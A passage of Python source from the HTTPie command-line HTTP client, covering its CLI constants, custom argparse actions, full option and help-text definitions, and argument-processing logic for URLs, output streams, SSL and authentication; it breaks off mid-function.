BASE_OUTPUT_OPTIONS = frozenset({ OUT_REQ_HEAD, OUT_REQ_BODY, OUT_RESP_HEAD, OUT_RESP_BODY, }) OUTPUT_OPTIONS = frozenset({ *BASE_OUTPUT_OPTIONS, OUT_RESP_META, }) # Pretty class PrettyOptions(enum.Enum): STDOUT_TTY_ONLY = enum.auto() PRETTY_MAP = { 'all': ['format', 'colors'], 'colors': ['colors'], 'format': ['format'], 'none': [] } PRETTY_STDOUT_TTY_ONLY = PrettyOptions.STDOUT_TTY_ONLY DEFAULT_FORMAT_OPTIONS = [ 'headers.sort:true', 'json.format:true', 'json.indent:4', 'json.sort_keys:true', 'xml.format:true', 'xml.indent:2', ] SORTED_FORMAT_OPTIONS = [ 'headers.sort:true', 'json.sort_keys:true', ] SORTED_FORMAT_OPTIONS_STRING = ','.join(SORTED_FORMAT_OPTIONS) UNSORTED_FORMAT_OPTIONS_STRING = ','.join( option.replace('true', 'false') for option in SORTED_FORMAT_OPTIONS) # Defaults OUTPUT_OPTIONS_DEFAULT = OUT_RESP_HEAD + OUT_RESP_BODY OUTPUT_OPTIONS_DEFAULT_STDOUT_REDIRECTED = OUT_RESP_BODY OUTPUT_OPTIONS_DEFAULT_OFFLINE = OUT_REQ_HEAD + OUT_REQ_BODY class RequestType(enum.Enum): FORM = enum.auto() MULTIPART = enum.auto() JSON = enum.auto() File: httpie/cli/__init__.py File: httpie/cli/utils.py import argparse from typing import Any, Callable, Generic, Iterator, Iterable, Optional, TypeVar T = TypeVar('T') class Manual(argparse.Action): def __init__( self, option_strings, dest=argparse.SUPPRESS, default=argparse.SUPPRESS, help=None ): super().__init__( option_strings=option_strings, dest=dest, default=default, nargs=0, help=help ) def __call__(self, parser, namespace, values, option_string=None): parser.print_manual() parser.exit() class LazyChoices(argparse.Action, Generic[T]): def __init__( self, *args, getter: Callable[[], 
Iterable[T]], help_formatter: Optional[Callable[[T, bool], str]] = None, sort: bool = False, cache: bool = True, isolation_mode: bool = False, **kwargs ) -> None: self.getter = getter self.help_formatter = help_formatter self.sort = sort self.cache = cache self.isolation_mode = isolation_mode self._help: Optional[str] = None self._obj: Optional[Iterable[T]] = None super().__init__(*args, **kwargs) self.choices = self def load(self) -> T: if self._obj is None or not self.cache: self._obj = self.getter() assert self._obj is not None return self._obj @property def help(self) -> str: if self._help is None and self.help_formatter is not None: self._help = self.help_formatter( self.load(), isolation_mode=self.isolation_mode ) return self._help @help.setter def help(self, value: Any) -> None: self._help = value def __contains__(self, item: Any) -> bool: return item in self.load() def __iter__(self) -> Iterator[T]: if self.sort: return iter(sorted(self.load())) else: return iter(self.load()) def __call__(self, parser, namespace, values, option_string=None): setattr(namespace, self.dest, values) File: httpie/cli/definition.py from __future__ import annotations import os import textwrap from argparse import FileType from httpie import __doc__, __version__ from httpie.cli.argtypes import (KeyValueArgType, SessionNameValidator, SSLCredentials, readable_file_arg, response_charset_type, response_mime_type) from httpie.cli.constants import (BASE_OUTPUT_OPTIONS, DEFAULT_FORMAT_OPTIONS, OUT_REQ_BODY, OUT_REQ_HEAD, OUT_RESP_BODY, OUT_RESP_HEAD, OUT_RESP_META, OUTPUT_OPTIONS, OUTPUT_OPTIONS_DEFAULT, PRETTY_MAP, PRETTY_STDOUT_TTY_ONLY, SEPARATOR_GROUP_ALL_ITEMS, SEPARATOR_PROXY, SORTED_FORMAT_OPTIONS_STRING, UNSORTED_FORMAT_OPTIONS_STRING, RequestType) from httpie.cli.options import ParserSpec, Qualifiers, to_argparse from httpie.output.formatters.colors import (AUTO_STYLE, DEFAULT_STYLE, BUNDLED_STYLES, get_available_styles) from httpie.plugins.builtin import BuiltinAuthPlugin from httpie.plugins.registry import plugin_manager from httpie.ssl_ import AVAILABLE_SSL_VERSION_ARG_MAPPING, DEFAULT_SSL_CIPHERS_STRING # Man pages are static (built when making a release). # We use this check to not include generated, system-specific information there (e.g., default --ciphers). IS_MAN_PAGE = bool(os.environ.get('HTTPIE_BUILDING_MAN_PAGES')) options = ParserSpec( 'http', description=f'{__doc__.strip()} <https://httpie.io>', epilog=""" For every --OPTION there is also a --no-OPTION that reverts OPTION to its default value. Suggestions and bug reports are greatly appreciated: https://github.com/httpie/cli/issues """, source_file=__file__ ) ####################################################################### # Positional arguments. ####################################################################### positional_arguments = options.add_group( 'Positional arguments', description=""" These arguments come after any flags and in the order they are listed here. Only URL is required. """, ) positional_arguments.add_argument( dest='method', metavar='METHOD', nargs=Qualifiers.OPTIONAL, default=None, short_help='The HTTP method to be used for the request (GET, POST, PUT, DELETE, ...).', help=""" The HTTP method to be used for the request (GET, POST, PUT, DELETE, ...). 
This argument can be omitted in which case HTTPie will use POST if there is some data to be sent, otherwise GET: $ http example.org # => GET $ http example.org hello=world # => POST """, ) positional_arguments.add_argument( dest='url', metavar='URL', short_help='The request URL.', help=""" The request URL. Scheme defaults to 'http://' if the URL does not include one. (You can override this with: --default-scheme=http/https) You can also use a shorthand for localhost $ http :3000 # => http://localhost:3000 $ http :/foo # => http://localhost/foo """, ) positional_arguments.add_argument( dest='request_items', metavar='REQUEST_ITEM', nargs=Qualifiers.ZERO_OR_MORE, default=None, type=KeyValueArgType(*SEPARATOR_GROUP_ALL_ITEMS), short_help=( 'HTTPie’s request items syntax for specifying HTTP headers, JSON/Form' 'data, files, and URL parameters.' ), nested_options=[ ('HTTP Headers', 'Name:Value', 'Arbitrary HTTP header, e.g X-API-Token:123'), ('URL Parameters', 'name==value', 'Querystring parameter to the URL, e.g limit==50'), ('Data Fields', 'field=value', 'Data fields to be serialized as JSON (default) or Form Data (with --form)'), ('Raw JSON Fields', 'field:=json', 'Data field for real JSON types.'), ('File upload Fields', 'field@/dir/file', 'Path field for uploading a file.'), ], help=r""" Optional key-value pairs to be included in the request. The separator used determines the type: ':' HTTP headers: Referer:https://httpie.io Cookie:foo=bar User-Agent:bacon/1.0 '==' URL parameters to be appended to the request URI: search==httpie '=' Data fields to be serialized into a JSON object (with --json, -j) or form data (with --form, -f): name=HTTPie language=Python description='CLI HTTP client' ':=' Non-string JSON data fields (only with --json, -j): awesome:=true amount:=42 colors:='["red", "green", "blue"]' '@' Form file fields (only with --form or --multipart): cv@~/Documents/CV.pdf cv@'~/Documents/CV.pdf;type=application/pdf' '=@' A data field like '=', but takes a file path and embeds its content: essay=@Documents/essay.txt ':=@' A raw JSON field like ':=', but takes a file path and embeds its content: package:=@./package.json You can use a backslash to escape a colliding separator in the field name: field-name-with\:colon=value """, ) ####################################################################### # Content type. ####################################################################### content_types = options.add_group('Predefined content types') content_types.add_argument( '--json', '-j', action='store_const', const=RequestType.JSON, dest='request_type', short_help='(default) Serialize data items from the command line as a JSON object.', help=""" (default) Data items from the command line are serialized as a JSON object. The Content-Type and Accept headers are set to application/json (if not specified). """, ) content_types.add_argument( '--form', '-f', action='store_const', const=RequestType.FORM, dest='request_type', short_help='Serialize data items from the command line as form field data.', help=""" Data items from the command line are serialized as form fields. The Content-Type is set to application/x-www-form-urlencoded (if not specified). The presence of any file fields results in a multipart/form-data request. """, ) content_types.add_argument( '--multipart', action='store_const', const=RequestType.MULTIPART, dest='request_type', short_help=( 'Similar to --form, but always sends a multipart/form-data ' 'request (i.e., even without files).' 
) ) content_types.add_argument( '--boundary', short_help=( 'Specify a custom boundary string for multipart/form-data requests. ' 'Only has effect only together with --form.' ) ) content_types.add_argument( '--raw', short_help='Pass raw request data without extra processing.', help=""" This option allows you to pass raw request data without extra processing (as opposed to the structured request items syntax): $ http --raw='data' pie.dev/post You can achieve the same by piping the data via stdin: $ echo data | http pie.dev/post Or have HTTPie load the raw data from a file: $ http pie.dev/post @data.txt """, ) ####################################################################### # Content processing. ####################################################################### processing_options = options.add_group('Content processing options') processing_options.add_argument( '--compress', '-x', action='count', default=0, short_help='Compress the content with Deflate algorithm.', help=""" Content compressed (encoded) with Deflate algorithm. The Content-Encoding header is set to deflate. Compression is skipped if it appears that compression ratio is negative. Compression can be forced by repeating the argument. """, ) ####################################################################### # Output processing ####################################################################### def format_style_help(available_styles, *, isolation_mode: bool = False): text = """ Output coloring style (default is "{default}"). It can be one of: {available_styles} """ if isolation_mode: text += '\n\n' text += 'For finding out all available styles in your system, try:\n\n' text += ' $ http --style\n' text += textwrap.dedent(""" The "{auto_style}" style follows your terminal's ANSI color styles. For non-{auto_style} styles to work properly, please make sure that the $TERM environment variable is set to "xterm-256color" or similar (e.g., via `export TERM=xterm-256color' in your ~/.bashrc). """) if isolation_mode: available_styles = sorted(BUNDLED_STYLES) available_styles_text = '\n'.join( f' {line.strip()}' for line in textwrap.wrap(', '.join(available_styles), 60) ).strip() return text.format( default=DEFAULT_STYLE, available_styles=available_styles_text, auto_style=AUTO_STYLE, ) _sorted_kwargs = { 'action': 'append_const', 'const': SORTED_FORMAT_OPTIONS_STRING, 'dest': 'format_options', } _unsorted_kwargs = { 'action': 'append_const', 'const': UNSORTED_FORMAT_OPTIONS_STRING, 'dest': 'format_options', } output_processing = options.add_group('Output processing') output_processing.add_argument( '--pretty', dest='prettify', default=PRETTY_STDOUT_TTY_ONLY, choices=sorted(PRETTY_MAP.keys()), short_help='Control the processing of console outputs.', help=""" Controls output processing. The value can be "none" to not prettify the output (default for redirected output), "all" to apply both colors and formatting (default for terminal output), "colors", or "format". """, ) output_processing.add_argument( '--style', '-s', dest='style', metavar='STYLE', default=DEFAULT_STYLE, action='lazy_choices', getter=get_available_styles, short_help=f'Output coloring style (default is "{DEFAULT_STYLE}").', help_formatter=format_style_help, ) # The closest approx. of the documented resetting to default via --no-<option>. # We hide them from the doc because they act only as low-level aliases here. 
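# (E.g. `--no-unsorted` appends the sorted defaults
#  'headers.sort:true,json.sort_keys:true' back onto args.format_options,
#  mirroring what `--sorted` does, so a later flag can override an earlier
#  `--unsorted`.)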
output_processing.add_argument( '--no-unsorted', **_sorted_kwargs, help=Qualifiers.SUPPRESS ) output_processing.add_argument( '--no-sorted', **_unsorted_kwargs, help=Qualifiers.SUPPRESS ) output_processing.add_argument( '--unsorted', **_unsorted_kwargs, short_help='Disables all sorting while formatting output.', help=f""" Disables all sorting while formatting output. It is a shortcut for: --format-options={UNSORTED_FORMAT_OPTIONS_STRING} """, ) output_processing.add_argument( '--sorted', **_sorted_kwargs, short_help='Re-enables all sorting options while formatting output.', help=f""" Re-enables all sorting options while formatting output. It is a shortcut for: --format-options={SORTED_FORMAT_OPTIONS_STRING} """, ) output_processing.add_argument( '--response-charset', metavar='ENCODING', type=response_charset_type, short_help='Override the response encoding for terminal display purposes.', help=""" Override the response encoding for terminal display purposes, e.g.: --response-charset=utf8 --response-charset=big5 """, ) output_processing.add_argument( '--response-mime', metavar='MIME_TYPE', type=response_mime_type, short_help='Override the response mime type for coloring and formatting for the terminal.', help=""" Override the response mime type for coloring and formatting for the terminal, e.g.: --response-mime=application/json --response-mime=text/xml """, ) output_processing.add_argument( '--format-options', action='append', short_help='Controls output formatting.', help=""" Controls output formatting. Only relevant when formatting is enabled through (explicit or implied) --pretty=all or --pretty=format. The following are the default options: {option_list} You may use this option multiple times, as well as specify multiple comma-separated options at the same time. For example, this modifies the settings to disable the sorting of JSON keys, and sets the indent size to 2: --format-options json.sort_keys:false,json.indent:2 This is something you will typically put into your config file. """.format( option_list='\n'.join( f' {option}' for option in DEFAULT_FORMAT_OPTIONS ).strip() ), ) ####################################################################### # Output options ####################################################################### output_options = options.add_group('Output options') output_options.add_argument( '--print', '-p', dest='output_options', metavar='WHAT', short_help='Options to specify what the console output should contain.', help=f""" String specifying what the output should contain: '{OUT_REQ_HEAD}' request headers '{OUT_REQ_BODY}' request body '{OUT_RESP_HEAD}' response headers '{OUT_RESP_BODY}' response body '{OUT_RESP_META}' response metadata The default behaviour is '{OUTPUT_OPTIONS_DEFAULT}' (i.e., the response headers and body is printed), if standard output is not redirected. If the output is piped to another program or to a file, then only the response body is printed by default. """, ) output_options.add_argument( '--headers', '-h', dest='output_options', action='store_const', const=OUT_RESP_HEAD, short_help='Print only the response headers.', help=f""" Print only the response headers. Shortcut for --print={OUT_RESP_HEAD}. """, ) output_options.add_argument( '--meta', '-m', dest='output_options', action='store_const', const=OUT_RESP_META, short_help='Print only the response metadata.', help=f""" Print only the response metadata. Shortcut for --print={OUT_RESP_META}. 
""", ) output_options.add_argument( '--body', '-b', dest='output_options', action='store_const', const=OUT_RESP_BODY, short_help='Print only the response body.', help=f""" Print only the response body. Shortcut for --print={OUT_RESP_BODY}. """, ) output_options.add_argument( '--verbose', '-v', dest='verbose', action='count', default=0, short_help='Make output more verbose.', help=f""" Verbose output. For the level one (with single `-v`/`--verbose`), print the whole request as well as the response. Also print any intermediary requests/responses (such as redirects). For the second level and higher, print these as well as the response metadata. Level one is a shortcut for: --all --print={''.join(sorted(BASE_OUTPUT_OPTIONS))} Level two is a shortcut for: --all --print={''.join(sorted(OUTPUT_OPTIONS))} """, ) output_options.add_argument( '--all', default=False, action='store_true', short_help='Show any intermediary requests/responses.', help=""" By default, only the final request/response is shown. Use this flag to show any intermediary requests/responses as well. Intermediary requests include followed redirects (with --follow), the first unauthorized request when Digest auth is used (--auth=digest), etc. """, ) output_options.add_argument( '--history-print', '-P', dest='output_options_history', metavar='WHAT', help=Qualifiers.SUPPRESS, ) output_options.add_argument( '--stream', '-S', action='store_true', default=False, short_help='Always stream the response body by line, i.e., behave like `tail -f`.', help=""" Always stream the response body by line, i.e., behave like `tail -f'. Without --stream and with --pretty (either set or implied), HTTPie fetches the whole response before it outputs the processed data. Set this option when you want to continuously display a prettified long-lived response, such as one from the Twitter streaming API. It is useful also without --pretty: It ensures that the output is flushed more often and in smaller chunks. """, ) output_options.add_argument( '--output', '-o', type=FileType('a+b'), dest='output_file', metavar='FILE', short_help='Save output to FILE instead of stdout.', help=""" Save output to FILE instead of stdout. If --download is also set, then only the response body is saved to FILE. Other parts of the HTTP exchange are printed to stderr. """, ) output_options.add_argument( '--download', '-d', action='store_true', default=False, short_help='Download the body to a file instead of printing it to stdout.', help=""" Do not print the response body to stdout. Rather, download it and store it in a file. The filename is guessed unless specified with --output [filename]. This action is similar to the default behaviour of wget. """, ) output_options.add_argument( '--continue', '-c', dest='download_resume', action='store_true', default=False, short_help='Resume an interrupted download (--output needs to be specified).', help=""" Resume an interrupted download. Note that the --output option needs to be specified as well. """, ) output_options.add_argument( '--quiet', '-q', action='count', default=0, short_help='Do not print to stdout or stderr, except for errors and warnings when provided once.', help=""" Do not print to stdout or stderr, except for errors and warnings when provided once. Provide twice to suppress warnings as well. stdout is still redirected if --output is specified. Flag doesn't affect behaviour of download beyond not printing to terminal. 
""", ) ####################################################################### # Sessions ####################################################################### session_name_validator = SessionNameValidator( 'Session name contains invalid characters.' ) sessions = options.add_group('Sessions', is_mutually_exclusive=True) sessions.add_argument( '--session', metavar='SESSION_NAME_OR_PATH', type=session_name_validator, short_help='Create, or reuse and update a session.', help=""" Create, or reuse and update a session. Within a session, custom headers, auth credential, as well as any cookies sent by the server persist between requests. Session files are stored in: [HTTPIE_CONFIG_DIR]/<HOST>/<SESSION_NAME>.json. See the following page to find out your default HTTPIE_CONFIG_DIR: https://httpie.io/docs/cli/config-file-directory """, ) sessions.add_argument( '--session-read-only', metavar='SESSION_NAME_OR_PATH', type=session_name_validator, short_help='Create or read a session without updating it', help=""" Create or read a session without updating it form the request/response exchange. """, ) ####################################################################### # Authentication ####################################################################### def format_auth_help(auth_plugins_mapping, *, isolation_mode: bool = False): text = """ The authentication mechanism to be used. Defaults to "{default}". {auth_types} """ auth_plugins = list(auth_plugins_mapping.values()) if isolation_mode: auth_plugins = [ auth_plugin for auth_plugin in auth_plugins if issubclass(auth_plugin, BuiltinAuthPlugin) ] text += '\n' text += 'To see all available auth types on your system, including ones installed via plugins, run:\n\n' text += ' $ http --auth-type' auth_types = '\n\n '.join( '"{type}": {name}{package}{description}'.format( type=plugin.auth_type, name=plugin.name, package=( '' if issubclass(plugin, BuiltinAuthPlugin) else f' (provided by {plugin.package_name})' ), description=( '' if not plugin.description else '\n ' + ('\n '.join(textwrap.wrap(plugin.description))) ), ) for plugin in auth_plugins ) return text.format( default=auth_plugins[0].auth_type, auth_types=auth_types, ) authentication = options.add_group('Authentication') authentication.add_argument( '--auth', '-a', default=None, metavar='USER[:PASS] | TOKEN', short_help='Credentials for the selected (-A) authentication method.', help=""" For username/password based authentication mechanisms (e.g basic auth or digest auth) if only the username is provided (-a username), HTTPie will prompt for the password. """, ) authentication.add_argument( '--auth-type', '-A', action='lazy_choices', default=None, getter=plugin_manager.get_auth_plugin_mapping, sort=True, cache=False, short_help='The authentication mechanism to be used.', help_formatter=format_auth_help, ) authentication.add_argument( '--ignore-netrc', default=False, action='store_true', short_help='Ignore credentials from .netrc.' ) ####################################################################### # Network ####################################################################### network = options.add_group('Network') network.add_argument( '--offline', default=False, action='store_true', short_help='Build the request and print it but don’t actually send it.' 
) network.add_argument( '--proxy', default=[], action='append', metavar='PROTOCOL:PROXY_URL', type=KeyValueArgType(SEPARATOR_PROXY), short_help='String mapping of protocol to the URL of the proxy.', help=""" String mapping protocol to the URL of the proxy (e.g. http:http://foo.bar:3128). You can specify multiple proxies with different protocols. The environment variables $ALL_PROXY, $HTTP_PROXY, and $HTTPS_proxy are supported as well. """, ) network.add_argument( '--follow', '-F', default=False, action='store_true', short_help='Follow 30x Location redirects.' ) network.add_argument( '--max-redirects', type=int, default=30, short_help='The maximum number of redirects that should be followed (with --follow).', help=""" By default, requests have a limit of 30 redirects (works with --follow). """, ) network.add_argument( '--max-headers', type=int, default=0, short_help=( 'The maximum number of response headers to be read before ' 'giving up (default 0, i.e., no limit).' ) ) network.add_argument( '--timeout', type=float, default=0, metavar='SECONDS', short_help='The connection timeout of the request in seconds.', help=""" The connection timeout of the request in seconds. The default value is 0, i.e., there is no timeout limit. This is not a time limit on the entire response download; rather, an error is reported if the server has not issued a response for timeout seconds (more precisely, if no bytes have been received on the underlying socket for timeout seconds). """, ) network.add_argument( '--check-status', default=False, action='store_true', short_help='Exit with an error status code if the server replies with an error.', help=""" By default, HTTPie exits with 0 when no network or other fatal errors occur. This flag instructs HTTPie to also check the HTTP status code and exit with an error if the status indicates one. When the server replies with a 4xx (Client Error) or 5xx (Server Error) status code, HTTPie exits with 4 or 5 respectively. If the response is a 3xx (Redirect) and --follow hasn't been set, then the exit status is 3. Also an error message is written to stderr if stdout is redirected. """, ) network.add_argument( '--path-as-is', default=False, action='store_true', short_help='Bypass dot segment (/../ or /./) URL squashing.' ) network.add_argument( '--chunked', default=False, action='store_true', short_help=( 'Enable streaming via chunked transfer encoding. ' 'The Transfer-Encoding header is set to chunked.' ) ) ####################################################################### # SSL ####################################################################### ssl = options.add_group('SSL') ssl.add_argument( '--verify', default='yes', short_help='If "no", skip SSL verification. If a file path, use it as a CA bundle.', help=""" Set to "no" (or "false") to skip checking the host's SSL certificate. Defaults to "yes" ("true"). You can also pass the path to a CA_BUNDLE file for private certs. (Or you can set the REQUESTS_CA_BUNDLE environment variable instead.) """, ) ssl.add_argument( '--ssl', dest='ssl_version', choices=sorted(AVAILABLE_SSL_VERSION_ARG_MAPPING.keys()), short_help='The desired protocol version to used.', help=""" The desired protocol version to use. This will default to SSL v2.3 which will negotiate the highest protocol that both the server and your installation of OpenSSL support. Available protocols may vary depending on OpenSSL installation (only the supported ones are shown here). 
""", ) CIPHERS_CURRENT_DEFAULTS = ( """ See `http --help` for the default ciphers list on you system. """ if IS_MAN_PAGE else f""" By default, the following ciphers are used on your system: {DEFAULT_SSL_CIPHERS_STRING} """ ) ssl.add_argument( '--ciphers', short_help='A string in the OpenSSL cipher list format.', help=f""" A string in the OpenSSL cipher list format. {CIPHERS_CURRENT_DEFAULTS} """ ) ssl.add_argument( '--cert', default=None, type=readable_file_arg, short_help='Specifies a local cert to use as the client-side SSL certificate.', help=""" You can specify a local cert to use as client side SSL certificate. This file may either contain both private key and certificate or you may specify --cert-key separately. """, ) ssl.add_argument( '--cert-key', default=None, type=readable_file_arg, short_help='The private key to use with SSL. Only needed if --cert is given.', help=""" The private key to use with SSL. Only needed if --cert is given and the certificate file does not contain the private key. """, ) ssl.add_argument( '--cert-key-pass', default=None, type=SSLCredentials, short_help='The passphrase to be used to with the given private key.', help=""" The passphrase to be used to with the given private key. Only needed if --cert-key is given and the key file requires a passphrase. If not provided, you’ll be prompted interactively. """ ) ####################################################################### # Troubleshooting ####################################################################### troubleshooting = options.add_group('Troubleshooting') troubleshooting.add_argument( '--ignore-stdin', '-I', action='store_true', default=False, short_help='Do not attempt to read stdin' ) troubleshooting.add_argument( '--help', action='help', default=Qualifiers.SUPPRESS, short_help='Show this help message and exit.', ) troubleshooting.add_argument( '--manual', action='manual', default=Qualifiers.SUPPRESS, short_help='Show the full manual.', ) troubleshooting.add_argument( '--version', action='version', version=__version__, short_help='Show version and exit.', ) troubleshooting.add_argument( '--traceback', action='store_true', default=False, short_help='Prints the exception traceback should one occur.', ) troubleshooting.add_argument( '--default-scheme', default='http', short_help='The default scheme to use if not specified in the URL.' ) troubleshooting.add_argument( '--debug', action='store_true', default=False, short_help='Print useful diagnostic information for bug reports.', help=""" Prints the exception traceback should one occur, as well as other information useful for debugging HTTPie itself and for reporting bugs. 
""", ) ####################################################################### # Finalization ####################################################################### options.finalize() parser = to_argparse(options) File: httpie/cli/exceptions.py class ParseError(Exception): pass File: httpie/cli/argparser.py import argparse import errno import os import re import sys from argparse import RawDescriptionHelpFormatter from textwrap import dedent from urllib.parse import urlsplit from requests.utils import get_netrc_auth from .argtypes import ( AuthCredentials, SSLCredentials, KeyValueArgType, PARSED_DEFAULT_FORMAT_OPTIONS, parse_auth, parse_format_options, ) from .constants import ( HTTP_GET, HTTP_POST, BASE_OUTPUT_OPTIONS, OUTPUT_OPTIONS, OUTPUT_OPTIONS_DEFAULT, OUTPUT_OPTIONS_DEFAULT_OFFLINE, OUTPUT_OPTIONS_DEFAULT_STDOUT_REDIRECTED, OUT_RESP_BODY, PRETTY_MAP, PRETTY_STDOUT_TTY_ONLY, RequestType, SEPARATOR_CREDENTIALS, SEPARATOR_GROUP_ALL_ITEMS, SEPARATOR_GROUP_DATA_ITEMS, URL_SCHEME_RE, ) from .exceptions import ParseError from .requestitems import RequestItems from ..context import Environment from ..plugins.registry import plugin_manager from ..utils import ExplicitNullAuth, get_content_type class HTTPieHelpFormatter(RawDescriptionHelpFormatter): """A nicer help formatter. Help for arguments can be indented and contain new lines. It will be de-dented and arguments in the help will be separated by a blank line for better readability. """ def __init__(self, max_help_position=6, *args, **kwargs): # A smaller indent for args help. kwargs['max_help_position'] = max_help_position super().__init__(*args, **kwargs) def _split_lines(self, text, width): text = dedent(text).strip() + '\n\n' return text.splitlines() def add_usage(self, usage, actions, groups, prefix=None): # Only display the positional arguments displayed_actions = [ action for action in actions if not action.option_strings ] _, exception, _ = sys.exc_info() if ( isinstance(exception, argparse.ArgumentError) and len(exception.args) >= 1 and isinstance(exception.args[0], argparse.Action) ): # add_usage path is also taken when you pass an invalid option, # e.g --style=invalid. If something like that happens, we want # to include to action that caused to the invalid usage into # the list of actions we are displaying. displayed_actions.insert(0, exception.args[0]) super().add_usage( usage, displayed_actions, groups, prefix="usage:\n " ) # TODO: refactor and design type-annotated data structures # for raw args + parsed args and keep things immutable. class BaseHTTPieArgumentParser(argparse.ArgumentParser): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.env = None self.args = None self.has_stdin_data = False self.has_input_data = False # noinspection PyMethodOverriding def parse_args( self, env: Environment, args=None, namespace=None ) -> argparse.Namespace: self.env = env self.args, no_options = self.parse_known_args(args, namespace) if self.args.debug: self.args.traceback = True self.has_stdin_data = ( self.env.stdin and not getattr(self.args, 'ignore_stdin', False) and not self.env.stdin_isatty ) self.has_input_data = self.has_stdin_data or getattr(self.args, 'raw', None) is not None return self.args # noinspection PyShadowingBuiltins def _print_message(self, message, file=None): # Sneak in our stderr/stdout. 
if hasattr(self, 'root'): env = self.root.env else: env = self.env if env is not None: file = { sys.stdout: env.stdout, sys.stderr: env.stderr, None: env.stderr }.get(file, file) if not hasattr(file, 'buffer') and isinstance(message, str): message = message.encode(env.stdout_encoding) super()._print_message(message, file) class HTTPieManagerArgumentParser(BaseHTTPieArgumentParser): def parse_known_args(self, args=None, namespace=None): try: return super().parse_known_args(args, namespace) except SystemExit as exc: if not hasattr(self, 'root') and exc.code == 2: # Argument Parser Error raise argparse.ArgumentError(None, None) raise class HTTPieArgumentParser(BaseHTTPieArgumentParser): """Adds additional logic to `argparse.ArgumentParser`. Handles all input (CLI args, file args, stdin), applies defaults, and performs extra validation. """ def __init__(self, *args, formatter_class=HTTPieHelpFormatter, **kwargs): kwargs.setdefault('add_help', False) super().__init__(*args, formatter_class=formatter_class, **kwargs) # noinspection PyMethodOverriding def parse_args( self, env: Environment, args=None, namespace=None ) -> argparse.Namespace: self.env = env self.env.args = namespace = namespace or argparse.Namespace() self.args, no_options = super().parse_known_args(args, namespace) if self.args.debug: self.args.traceback = True self.has_stdin_data = ( self.env.stdin and not self.args.ignore_stdin and not self.env.stdin_isatty ) self.has_input_data = self.has_stdin_data or self.args.raw is not None # Arguments processing and environment setup. self._apply_no_options(no_options) self._process_request_type() self._process_download_options() self._setup_standard_streams() self._process_output_options() self._process_pretty_options() self._process_format_options() self._guess_method() self._parse_items() self._process_url() self._process_auth() self._process_ssl_cert() if self.args.raw is not None: self._body_from_input(self.args.raw) elif self.has_stdin_data: self._body_from_file(self.env.stdin) if self.args.compress: # TODO: allow --compress with --chunked / --multipart if self.args.chunked: self.error('cannot combine --compress and --chunked') if self.args.multipart: self.error('cannot combine --compress and --multipart') return self.args def _process_request_type(self): request_type = self.args.request_type self.args.json = request_type is RequestType.JSON self.args.multipart = request_type is RequestType.MULTIPART self.args.form = request_type in { RequestType.FORM, RequestType.MULTIPART, } def _process_url(self): if self.args.url.startswith('://'): # Paste URL & add space shortcut: `http ://pie.dev` → `http://pie.dev` self.args.url = self.args.url[3:] if not URL_SCHEME_RE.match(self.args.url): if os.path.basename(self.env.program_name) == 'https': scheme = 'https://' else: scheme = self.args.default_scheme + '://' # See if we're using curl style shorthand for localhost (:3000/foo) shorthand = re.match(r'^:(?!:)(\d*)(/?.*)$', self.args.url) if shorthand: port = shorthand.group(1) rest = shorthand.group(2) self.args.url = scheme + 'localhost' if port: self.args.url += ':' + port self.args.url += rest else: self.args.url = scheme + self.args.url def _setup_standard_streams(self): """ Modify `env.stdout` and `env.stdout_isatty` based on args, if needed. """ self.args.output_file_specified = bool(self.args.output_file) if self.args.download: # FIXME: Come up with a cleaner solution. if not self.args.output_file and not self.env.stdout_isatty: # Use stdout as the download output file. 
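                # For example (illustrative): `http --download example.org > index.html`
                # reaches this branch because stdout is redirected; the response body
                # is written to the redirected stdout while all other console output
                # is diverted to stderr below.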
self.args.output_file = self.env.stdout # With `--download`, we write everything that would normally go to # `stdout` to `stderr` instead. Let's replace the stream so that # we don't have to use many `if`s throughout the codebase. # The response body will be treated separately. self.env.stdout = self.env.stderr self.env.stdout_isatty = self.env.stderr_isatty elif self.args.output_file: # When not `--download`ing, then `--output` simply replaces # `stdout`. The file is opened for appending, which isn't what # we want in this case. self.args.output_file.seek(0) try: self.args.output_file.truncate() except OSError as e: if e.errno == errno.EINVAL: # E.g. /dev/null on Linux. pass else: raise self.env.stdout = self.args.output_file self.env.stdout_isatty = False if self.args.quiet: self.env.quiet = self.args.quiet self.env.stderr = self.env.devnull if not (self.args.output_file_specified and not self.args.download): self.env.stdout = self.env.devnull self.env.apply_warnings_filter() def _process_ssl_cert(self): from httpie.ssl_ import _is_key_file_encrypted if self.args.cert_key_pass is None: self.args.cert_key_pass = SSLCredentials(None) if ( self.args.cert_key is not None and self.args.cert_key_pass.value is None and _is_key_file_encrypted(self.args.cert_key) ): self.args.cert_key_pass.prompt_password(self.args.cert_key) def _process_auth(self): # TODO: refactor & simplify this method. self.args.auth_plugin = None default_auth_plugin = plugin_manager.get_auth_plugins()[0] auth_type_set = self.args.auth_type is not None url = urlsplit(self.args.url) if self.args.auth is None and not auth_type_set: if url.username is not None: # Handle http://username:password@hostname/ username = url.username password = url.password or '' self.args.auth = AuthCredentials( key=username, value=password, sep=SEPARATOR_CREDENTIALS, orig=SEPARATOR_CREDENTIALS.join([username, password]) ) if self.args.auth is not None or auth_type_set: if not self.args.auth_type: self.args.auth_type = default_auth_plugin.auth_type plugin = plugin_manager.get_auth_plugin(self.args.auth_type)() if (not self.args.ignore_netrc and self.args.auth is None and plugin.netrc_parse): # Only host needed, so it’s OK URL not finalized. netrc_credentials = get_netrc_auth(self.args.url) if netrc_credentials: self.args.auth = AuthCredentials( key=netrc_credentials[0], value=netrc_credentials[1], sep=SEPARATOR_CREDENTIALS, orig=SEPARATOR_CREDENTIALS.join(netrc_credentials) ) if plugin.auth_require and self.args.auth is None: self.error('--auth required') plugin.raw_auth = self.args.auth self.args.auth_plugin = plugin already_parsed = isinstance(self.args.auth, AuthCredentials) if self.args.auth is None or not plugin.auth_parse: self.args.auth = plugin.get_auth() else: if already_parsed: # from the URL credentials = self.args.auth else: credentials = parse_auth(self.args.auth) if (not credentials.has_password() and plugin.prompt_password): if self.args.ignore_stdin: # Non-tty stdin read by now self.error( 'Unable to prompt for passwords because' ' --ignore-stdin is set.' 
